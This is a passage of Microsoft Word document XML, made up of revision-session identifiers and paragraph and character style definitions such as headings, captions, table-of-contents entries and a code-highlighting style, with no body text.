    <w:rsid w:val="008B091D"/>
    <w:rsid w:val="008B32DB"/>
    <w:rsid w:val="008B32F4"/>
    <w:rsid w:val="008B509D"/>
    <w:rsid w:val="008B7078"/>
    <w:rsid w:val="008B7D91"/>
    <w:rsid w:val="008C16EE"/>
    <w:rsid w:val="008C2FB7"/>
    <w:rsid w:val="008C2FDD"/>
    <w:rsid w:val="008C4F37"/>
    <w:rsid w:val="008C6FF5"/>
    <w:rsid w:val="008C78AC"/>
    <w:rsid w:val="008D03FD"/>
    <w:rsid w:val="008D3C55"/>
    <w:rsid w:val="008E21D0"/>
    <w:rsid w:val="008E3B2A"/>
    <w:rsid w:val="008E46CD"/>
    <w:rsid w:val="008E770B"/>
    <w:rsid w:val="008E7B9D"/>
    <w:rsid w:val="008F2B59"/>
    <w:rsid w:val="008F3717"/>
    <w:rsid w:val="008F4E4A"/>
    <w:rsid w:val="008F5576"/>
    <w:rsid w:val="008F6522"/>
    <w:rsid w:val="008F67E1"/>
    <w:rsid w:val="00903007"/>
    <w:rsid w:val="0090413A"/>
    <w:rsid w:val="009041C1"/>
    <w:rsid w:val="00905E02"/>
    <w:rsid w:val="0090636B"/>
    <w:rsid w:val="009073F8"/>
    <w:rsid w:val="00910F90"/>
    <w:rsid w:val="009133DD"/>
    <w:rsid w:val="0091449E"/>
    <w:rsid w:val="00915ED7"/>
    <w:rsid w:val="00916866"/>
    <w:rsid w:val="00916DA6"/>
    <w:rsid w:val="00917A3C"/>
    <w:rsid w:val="00917B75"/>
    <w:rsid w:val="00920768"/>
    <w:rsid w:val="00924378"/>
    <w:rsid w:val="00925CB6"/>
    <w:rsid w:val="0092719E"/>
    <w:rsid w:val="00931B8F"/>
    <w:rsid w:val="0093282B"/>
    <w:rsid w:val="00933497"/>
    <w:rsid w:val="00934403"/>
    <w:rsid w:val="00936703"/>
    <w:rsid w:val="00940756"/>
    <w:rsid w:val="00944AB7"/>
    <w:rsid w:val="009473DE"/>
    <w:rsid w:val="00952CFC"/>
    <w:rsid w:val="009547CB"/>
    <w:rsid w:val="00956C7A"/>
    <w:rsid w:val="00957C99"/>
    <w:rsid w:val="009607E8"/>
    <w:rsid w:val="00961FB7"/>
    <w:rsid w:val="00962E8B"/>
    <w:rsid w:val="00962FAF"/>
    <w:rsid w:val="009655D3"/>
    <w:rsid w:val="00970C15"/>
    <w:rsid w:val="00971105"/>
    <w:rsid w:val="00971C08"/>
    <w:rsid w:val="00972135"/>
    <w:rsid w:val="00972451"/>
    <w:rsid w:val="0097373F"/>
    <w:rsid w:val="009758D2"/>
    <w:rsid w:val="009818AF"/>
    <w:rsid w:val="009838BB"/>
    <w:rsid w:val="009A42F4"/>
    <w:rsid w:val="009A5E53"/>
    <w:rsid w:val="009B083B"/>
    <w:rsid w:val="009B3246"/>
    <w:rsid w:val="009B475C"/>
    <w:rsid w:val="009B493A"/>
    <w:rsid w:val="009B50CA"/>
    <w:rsid w:val="009B5804"/>
    <w:rsid w:val="009B6DF7"/>
    <w:rsid w:val="009C1B39"/>
    <w:rsid w:val="009C40C1"/>
    <w:rsid w:val="009C79D3"/>
    <w:rsid w:val="009D1A24"/>
    <w:rsid w:val="009D2E6D"/>
    <w:rsid w:val="009D360A"/>
    <w:rsid w:val="009D5E02"/>
    <w:rsid w:val="009D71B9"/>
    <w:rsid w:val="009D79A1"/>
    <w:rsid w:val="009E4436"/>
    <w:rsid w:val="009F4D8A"/>
    <w:rsid w:val="009F67CB"/>
    <w:rsid w:val="00A0362E"/>
    <w:rsid w:val="00A03AE4"/>
    <w:rsid w:val="00A03DD9"/>
    <w:rsid w:val="00A06E60"/>
    <w:rsid w:val="00A10E45"/>
    <w:rsid w:val="00A12239"/>
    <w:rsid w:val="00A132AA"/>
    <w:rsid w:val="00A1710D"/>
    <w:rsid w:val="00A20793"/>
    <w:rsid w:val="00A21F92"/>
    <w:rsid w:val="00A2616F"/>
    <w:rsid w:val="00A27238"/>
    <w:rsid w:val="00A3187A"/>
    <w:rsid w:val="00A327D4"/>
    <w:rsid w:val="00A349F9"/>
    <w:rsid w:val="00A34A00"/>
    <w:rsid w:val="00A3706C"/>
    <w:rsid w:val="00A41733"/>
    <w:rsid w:val="00A4335A"/>
    <w:rsid w:val="00A46F54"/>
    <w:rsid w:val="00A47A04"/>
    <w:rsid w:val="00A51C86"/>
    <w:rsid w:val="00A5204A"/>
    <w:rsid w:val="00A52889"/>
    <w:rsid w:val="00A53E8C"/>
    <w:rsid w:val="00A544B9"/>
    <w:rsid w:val="00A6006A"/>
    <w:rsid w:val="00A62334"/>
    <w:rsid w:val="00A62AD3"/>
    <w:rsid w:val="00A66025"/>
    <w:rsid w:val="00A71725"/>
    <w:rsid w:val="00A71786"/>
    <w:rsid w:val="00A739CF"/>
    <w:rsid w:val="00A742B8"/>
    <w:rsid w:val="00A74EDA"/>
    <w:rsid w:val="00A75B92"/>
    <w:rsid w:val="00A762E0"/>
    <w:rsid w:val="00A77DC7"/>
    <w:rsid w:val="00A82EBF"/>
    <w:rsid w:val="00A84998"/>
    <w:rsid w:val="00A91F6A"/>
    <w:rsid w:val="00A9582C"/>
    <w:rsid w:val="00A95F86"/>
    <w:rsid w:val="00A966E9"/>
    <w:rsid w:val="00A96791"/>
    <w:rsid w:val="00A96ED2"/>
    <w:rsid w:val="00A96FB2"/>
    <w:rsid w:val="00AA0F8E"/>
    <w:rsid w:val="00AA2BF5"/>
    <w:rsid w:val="00AA32C0"/>
    <w:rsid w:val="00AA392F"/>
    <w:rsid w:val="00AA771E"/>
    <w:rsid w:val="00AB0756"/>
    <w:rsid w:val="00AB1341"/>
    <w:rsid w:val="00AB538F"/>
    <w:rsid w:val="00AB56EB"/>
    <w:rsid w:val="00AB5BF0"/>
    <w:rsid w:val="00AB7357"/>
    <w:rsid w:val="00AC13AF"/>
    <w:rsid w:val="00AC7241"/>
    <w:rsid w:val="00AC79B0"/>
    <w:rsid w:val="00AD4BDB"/>
    <w:rsid w:val="00AD7E33"/>
    <w:rsid w:val="00AE0638"/>
    <w:rsid w:val="00AE3C7D"/>
    <w:rsid w:val="00AE41EB"/>
    <w:rsid w:val="00AE57D2"/>
    <w:rsid w:val="00AE5ECF"/>
    <w:rsid w:val="00AE6611"/>
    <w:rsid w:val="00AE709F"/>
    <w:rsid w:val="00AE718C"/>
    <w:rsid w:val="00AF46D8"/>
    <w:rsid w:val="00AF4D34"/>
    <w:rsid w:val="00AF5047"/>
    <w:rsid w:val="00AF6B0E"/>
    <w:rsid w:val="00B054A8"/>
    <w:rsid w:val="00B06409"/>
    <w:rsid w:val="00B0690F"/>
    <w:rsid w:val="00B1004C"/>
    <w:rsid w:val="00B107F8"/>
    <w:rsid w:val="00B143E1"/>
    <w:rsid w:val="00B167A6"/>
    <w:rsid w:val="00B2076E"/>
    <w:rsid w:val="00B20A93"/>
    <w:rsid w:val="00B2373C"/>
    <w:rsid w:val="00B246B2"/>
    <w:rsid w:val="00B26006"/>
    <w:rsid w:val="00B322AC"/>
    <w:rsid w:val="00B33428"/>
    <w:rsid w:val="00B33787"/>
    <w:rsid w:val="00B349C5"/>
    <w:rsid w:val="00B352F7"/>
    <w:rsid w:val="00B361F7"/>
    <w:rsid w:val="00B4501C"/>
    <w:rsid w:val="00B457BA"/>
    <w:rsid w:val="00B46D49"/>
    <w:rsid w:val="00B47251"/>
    <w:rsid w:val="00B47CD6"/>
    <w:rsid w:val="00B5103A"/>
    <w:rsid w:val="00B5257C"/>
    <w:rsid w:val="00B53CB6"/>
    <w:rsid w:val="00B551D0"/>
    <w:rsid w:val="00B65BE9"/>
    <w:rsid w:val="00B67046"/>
    <w:rsid w:val="00B71144"/>
    <w:rsid w:val="00B729BE"/>
    <w:rsid w:val="00B72F37"/>
    <w:rsid w:val="00B745AA"/>
    <w:rsid w:val="00B746AF"/>
    <w:rsid w:val="00B74AEC"/>
    <w:rsid w:val="00B74BC4"/>
    <w:rsid w:val="00B8049D"/>
    <w:rsid w:val="00B8060D"/>
    <w:rsid w:val="00B81A59"/>
    <w:rsid w:val="00B820C4"/>
    <w:rsid w:val="00B85A3D"/>
    <w:rsid w:val="00B872E6"/>
    <w:rsid w:val="00B90E8D"/>
    <w:rsid w:val="00B93183"/>
    <w:rsid w:val="00B960C2"/>
    <w:rsid w:val="00BA18F4"/>
    <w:rsid w:val="00BB09F3"/>
    <w:rsid w:val="00BB0FF8"/>
    <w:rsid w:val="00BB4F10"/>
    <w:rsid w:val="00BB6384"/>
    <w:rsid w:val="00BB7F89"/>
    <w:rsid w:val="00BC23F3"/>
    <w:rsid w:val="00BC2E9D"/>
    <w:rsid w:val="00BC386A"/>
    <w:rsid w:val="00BC48DD"/>
    <w:rsid w:val="00BD053D"/>
    <w:rsid w:val="00BD20BD"/>
    <w:rsid w:val="00BD3B34"/>
    <w:rsid w:val="00BD524C"/>
    <w:rsid w:val="00BD5A64"/>
    <w:rsid w:val="00BD67BD"/>
    <w:rsid w:val="00BD68EB"/>
    <w:rsid w:val="00BE0787"/>
    <w:rsid w:val="00BE4C4F"/>
    <w:rsid w:val="00BE4E04"/>
    <w:rsid w:val="00BE5CCE"/>
    <w:rsid w:val="00BE5E87"/>
    <w:rsid w:val="00BE7A6D"/>
    <w:rsid w:val="00BF02C3"/>
    <w:rsid w:val="00BF14BE"/>
    <w:rsid w:val="00BF1A58"/>
    <w:rsid w:val="00BF3467"/>
    <w:rsid w:val="00BF6895"/>
    <w:rsid w:val="00BF6ADE"/>
    <w:rsid w:val="00C006DD"/>
    <w:rsid w:val="00C04D3A"/>
    <w:rsid w:val="00C04F30"/>
    <w:rsid w:val="00C06320"/>
    <w:rsid w:val="00C105FC"/>
    <w:rsid w:val="00C11F4F"/>
    <w:rsid w:val="00C1508D"/>
    <w:rsid w:val="00C16036"/>
    <w:rsid w:val="00C17088"/>
    <w:rsid w:val="00C264FC"/>
    <w:rsid w:val="00C30647"/>
    <w:rsid w:val="00C32615"/>
    <w:rsid w:val="00C41DC1"/>
    <w:rsid w:val="00C41EE3"/>
    <w:rsid w:val="00C420ED"/>
    <w:rsid w:val="00C42CB2"/>
    <w:rsid w:val="00C43210"/>
    <w:rsid w:val="00C43301"/>
    <w:rsid w:val="00C438FE"/>
    <w:rsid w:val="00C43F73"/>
    <w:rsid w:val="00C45C8F"/>
    <w:rsid w:val="00C45E16"/>
    <w:rsid w:val="00C47403"/>
    <w:rsid w:val="00C52972"/>
    <w:rsid w:val="00C52D04"/>
    <w:rsid w:val="00C54094"/>
    <w:rsid w:val="00C5443F"/>
    <w:rsid w:val="00C546C4"/>
    <w:rsid w:val="00C56880"/>
    <w:rsid w:val="00C56990"/>
    <w:rsid w:val="00C642B6"/>
    <w:rsid w:val="00C65104"/>
    <w:rsid w:val="00C65E78"/>
    <w:rsid w:val="00C67B62"/>
    <w:rsid w:val="00C70510"/>
    <w:rsid w:val="00C70B86"/>
    <w:rsid w:val="00C70FF1"/>
    <w:rsid w:val="00C72536"/>
    <w:rsid w:val="00C72587"/>
    <w:rsid w:val="00C7783F"/>
    <w:rsid w:val="00C77C7A"/>
    <w:rsid w:val="00C820B8"/>
    <w:rsid w:val="00C82DDF"/>
    <w:rsid w:val="00C835E7"/>
    <w:rsid w:val="00C83C66"/>
    <w:rsid w:val="00C850B9"/>
    <w:rsid w:val="00C8760F"/>
    <w:rsid w:val="00C9602B"/>
    <w:rsid w:val="00C962E0"/>
    <w:rsid w:val="00CA0AAE"/>
    <w:rsid w:val="00CA1CD6"/>
    <w:rsid w:val="00CA6AE8"/>
    <w:rsid w:val="00CA7AD4"/>
    <w:rsid w:val="00CB10F3"/>
    <w:rsid w:val="00CB1DB7"/>
    <w:rsid w:val="00CC22EE"/>
    <w:rsid w:val="00CC2509"/>
    <w:rsid w:val="00CC3E9B"/>
    <w:rsid w:val="00CC4F01"/>
    <w:rsid w:val="00CC78A8"/>
    <w:rsid w:val="00CE6AA5"/>
    <w:rsid w:val="00CE7AC9"/>
    <w:rsid w:val="00CF3032"/>
    <w:rsid w:val="00CF4D12"/>
    <w:rsid w:val="00CF61D9"/>
    <w:rsid w:val="00D003BA"/>
    <w:rsid w:val="00D0041C"/>
    <w:rsid w:val="00D00A8E"/>
    <w:rsid w:val="00D00CC5"/>
    <w:rsid w:val="00D01183"/>
    <w:rsid w:val="00D01230"/>
    <w:rsid w:val="00D0627E"/>
    <w:rsid w:val="00D075BE"/>
    <w:rsid w:val="00D106C4"/>
    <w:rsid w:val="00D10F44"/>
    <w:rsid w:val="00D12B19"/>
    <w:rsid w:val="00D13A58"/>
    <w:rsid w:val="00D26C25"/>
    <w:rsid w:val="00D30EEB"/>
    <w:rsid w:val="00D35507"/>
    <w:rsid w:val="00D465C6"/>
    <w:rsid w:val="00D475B0"/>
    <w:rsid w:val="00D513C9"/>
    <w:rsid w:val="00D51877"/>
    <w:rsid w:val="00D5221E"/>
    <w:rsid w:val="00D52B12"/>
    <w:rsid w:val="00D65E55"/>
    <w:rsid w:val="00D71A7B"/>
    <w:rsid w:val="00D735D8"/>
    <w:rsid w:val="00D76125"/>
    <w:rsid w:val="00D76898"/>
    <w:rsid w:val="00D768D8"/>
    <w:rsid w:val="00D81133"/>
    <w:rsid w:val="00D8314E"/>
    <w:rsid w:val="00D83ADD"/>
    <w:rsid w:val="00D84090"/>
    <w:rsid w:val="00D8608C"/>
    <w:rsid w:val="00D8614C"/>
    <w:rsid w:val="00D914D1"/>
    <w:rsid w:val="00D94232"/>
    <w:rsid w:val="00D95000"/>
    <w:rsid w:val="00D952CD"/>
    <w:rsid w:val="00D9685B"/>
    <w:rsid w:val="00D96892"/>
    <w:rsid w:val="00D97204"/>
    <w:rsid w:val="00DA529D"/>
    <w:rsid w:val="00DA63FF"/>
    <w:rsid w:val="00DB2661"/>
    <w:rsid w:val="00DC08E9"/>
    <w:rsid w:val="00DC1F97"/>
    <w:rsid w:val="00DC2D4C"/>
    <w:rsid w:val="00DC3156"/>
    <w:rsid w:val="00DC5BBC"/>
    <w:rsid w:val="00DC6392"/>
    <w:rsid w:val="00DC754E"/>
    <w:rsid w:val="00DD085D"/>
    <w:rsid w:val="00DD0993"/>
    <w:rsid w:val="00DD5B8B"/>
    <w:rsid w:val="00DD76F7"/>
    <w:rsid w:val="00DE50E0"/>
    <w:rsid w:val="00DE6F11"/>
    <w:rsid w:val="00DF0978"/>
    <w:rsid w:val="00DF1C48"/>
    <w:rsid w:val="00DF2AB8"/>
    <w:rsid w:val="00DF50EA"/>
    <w:rsid w:val="00E025A4"/>
    <w:rsid w:val="00E03A9F"/>
    <w:rsid w:val="00E0644B"/>
    <w:rsid w:val="00E066AA"/>
    <w:rsid w:val="00E109FC"/>
    <w:rsid w:val="00E12DE9"/>
    <w:rsid w:val="00E1625A"/>
    <w:rsid w:val="00E213BC"/>
    <w:rsid w:val="00E227E4"/>
    <w:rsid w:val="00E24202"/>
    <w:rsid w:val="00E24EEF"/>
    <w:rsid w:val="00E33ABD"/>
    <w:rsid w:val="00E35055"/>
    <w:rsid w:val="00E35139"/>
    <w:rsid w:val="00E35630"/>
    <w:rsid w:val="00E40F4A"/>
    <w:rsid w:val="00E42A3E"/>
    <w:rsid w:val="00E43699"/>
    <w:rsid w:val="00E44CF1"/>
    <w:rsid w:val="00E4584B"/>
    <w:rsid w:val="00E45A58"/>
    <w:rsid w:val="00E47F12"/>
    <w:rsid w:val="00E50607"/>
    <w:rsid w:val="00E50696"/>
    <w:rsid w:val="00E54741"/>
    <w:rsid w:val="00E54DE8"/>
    <w:rsid w:val="00E54E26"/>
    <w:rsid w:val="00E55922"/>
    <w:rsid w:val="00E57567"/>
    <w:rsid w:val="00E61857"/>
    <w:rsid w:val="00E632E1"/>
    <w:rsid w:val="00E632FA"/>
    <w:rsid w:val="00E6444E"/>
    <w:rsid w:val="00E656A4"/>
    <w:rsid w:val="00E66AF9"/>
    <w:rsid w:val="00E66B41"/>
    <w:rsid w:val="00E67EB7"/>
    <w:rsid w:val="00E76B06"/>
    <w:rsid w:val="00E77BD1"/>
    <w:rsid w:val="00E85D26"/>
    <w:rsid w:val="00E85DB1"/>
    <w:rsid w:val="00E867AF"/>
    <w:rsid w:val="00E905A8"/>
    <w:rsid w:val="00E940DD"/>
    <w:rsid w:val="00E941E7"/>
    <w:rsid w:val="00E9471E"/>
    <w:rsid w:val="00E94E11"/>
    <w:rsid w:val="00E9516F"/>
    <w:rsid w:val="00E956DF"/>
    <w:rsid w:val="00E96621"/>
    <w:rsid w:val="00E967D5"/>
    <w:rsid w:val="00EA02FE"/>
    <w:rsid w:val="00EA16EF"/>
    <w:rsid w:val="00EA26B3"/>
    <w:rsid w:val="00EA572C"/>
    <w:rsid w:val="00EA5A78"/>
    <w:rsid w:val="00EA6C5D"/>
    <w:rsid w:val="00EB0241"/>
    <w:rsid w:val="00EB0ABD"/>
    <w:rsid w:val="00EB1507"/>
    <w:rsid w:val="00EB4D95"/>
    <w:rsid w:val="00EB7E28"/>
    <w:rsid w:val="00EC0288"/>
    <w:rsid w:val="00EC07AB"/>
    <w:rsid w:val="00EC252F"/>
    <w:rsid w:val="00EC45A8"/>
    <w:rsid w:val="00EC4A8B"/>
    <w:rsid w:val="00EC5E49"/>
    <w:rsid w:val="00ED25DA"/>
    <w:rsid w:val="00ED2F1D"/>
    <w:rsid w:val="00ED2F4A"/>
    <w:rsid w:val="00ED3E14"/>
    <w:rsid w:val="00ED482C"/>
    <w:rsid w:val="00ED53D8"/>
    <w:rsid w:val="00ED68C5"/>
    <w:rsid w:val="00EE15BF"/>
    <w:rsid w:val="00EE6912"/>
    <w:rsid w:val="00EE6F74"/>
    <w:rsid w:val="00EF16AF"/>
    <w:rsid w:val="00EF3BBA"/>
    <w:rsid w:val="00EF5882"/>
    <w:rsid w:val="00EF7A4E"/>
    <w:rsid w:val="00F02512"/>
    <w:rsid w:val="00F03094"/>
    <w:rsid w:val="00F040D6"/>
    <w:rsid w:val="00F12BD3"/>
    <w:rsid w:val="00F20A18"/>
    <w:rsid w:val="00F21B70"/>
    <w:rsid w:val="00F227BD"/>
    <w:rsid w:val="00F251A8"/>
    <w:rsid w:val="00F27410"/>
    <w:rsid w:val="00F27B11"/>
    <w:rsid w:val="00F30726"/>
    <w:rsid w:val="00F327C5"/>
    <w:rsid w:val="00F366BB"/>
    <w:rsid w:val="00F40E25"/>
    <w:rsid w:val="00F415D2"/>
    <w:rsid w:val="00F435CE"/>
    <w:rsid w:val="00F43699"/>
    <w:rsid w:val="00F4740B"/>
    <w:rsid w:val="00F50DFB"/>
    <w:rsid w:val="00F52BFD"/>
    <w:rsid w:val="00F54F4F"/>
    <w:rsid w:val="00F552B5"/>
    <w:rsid w:val="00F56700"/>
    <w:rsid w:val="00F570B5"/>
    <w:rsid w:val="00F60CAE"/>
    <w:rsid w:val="00F63868"/>
    <w:rsid w:val="00F64C76"/>
    <w:rsid w:val="00F65023"/>
    <w:rsid w:val="00F66124"/>
    <w:rsid w:val="00F67DA2"/>
    <w:rsid w:val="00F702E5"/>
    <w:rsid w:val="00F77514"/>
    <w:rsid w:val="00F77B86"/>
    <w:rsid w:val="00F8059F"/>
    <w:rsid w:val="00F810D0"/>
    <w:rsid w:val="00F820A8"/>
    <w:rsid w:val="00F86144"/>
    <w:rsid w:val="00F872EA"/>
    <w:rsid w:val="00F90C18"/>
    <w:rsid w:val="00F92972"/>
    <w:rsid w:val="00F936A2"/>
    <w:rsid w:val="00F940EE"/>
    <w:rsid w:val="00F952C4"/>
    <w:rsid w:val="00F97079"/>
    <w:rsid w:val="00FA0323"/>
    <w:rsid w:val="00FA0890"/>
    <w:rsid w:val="00FA4090"/>
    <w:rsid w:val="00FA44E2"/>
    <w:rsid w:val="00FA5245"/>
    <w:rsid w:val="00FA57CC"/>
    <w:rsid w:val="00FA6559"/>
    <w:rsid w:val="00FA763D"/>
    <w:rsid w:val="00FB066A"/>
    <w:rsid w:val="00FB16B9"/>
    <w:rsid w:val="00FB3492"/>
    <w:rsid w:val="00FB3736"/>
    <w:rsid w:val="00FB4337"/>
    <w:rsid w:val="00FC00AC"/>
    <w:rsid w:val="00FC267E"/>
    <w:rsid w:val="00FC33F4"/>
    <w:rsid w:val="00FC59FF"/>
    <w:rsid w:val="00FC5F1C"/>
    <w:rsid w:val="00FC60E9"/>
    <w:rsid w:val="00FC7232"/>
    <w:rsid w:val="00FC75C1"/>
    <w:rsid w:val="00FC7B76"/>
    <w:rsid w:val="00FD0355"/>
    <w:rsid w:val="00FD2481"/>
    <w:rsid w:val="00FD4243"/>
    <w:rsid w:val="00FD4824"/>
    <w:rsid w:val="00FD5BB5"/>
    <w:rsid w:val="00FD7B27"/>
    <w:rsid w:val="00FE1CFF"/>
    <w:rsid w:val="00FE2AD3"/>
    <w:rsid w:val="00FE7AFA"/>
    <w:rsid w:val="00FF0118"/>
    <w:rsid w:val="00FF20F4"/>
    <w:rsid w:val="00FF44DB"/>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09D9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{17DCE124-BB5C-42E6-BE6A-94B67B67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56"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00DC3156"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="0" w:after="60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C3156"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EF7A4E"/>
    <w:pPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Heading3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00EF7A4E"/>
    <w:pPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading5Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00DC31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15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C3156"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EF7A4E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b/>
      <w:i/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00EF7A4E"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:i/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00DC3156"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009B6DF7"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00B8049D"/>
    <w:pPr>
      <w:spacing w:before="0" w:after="200" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="19"/>
    <w:qFormat/>
    <w:rsid w:val="00D01183"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D96892"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D96892"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="006A0D62"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="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6A0D62"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006A0D62"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="280"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="003804C6"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001E4FCA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="560"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00834D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4D75"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00834D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4D75"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hljs-builtin">
    <w:name w:val="hljs-built_in"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="001618F7"/>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
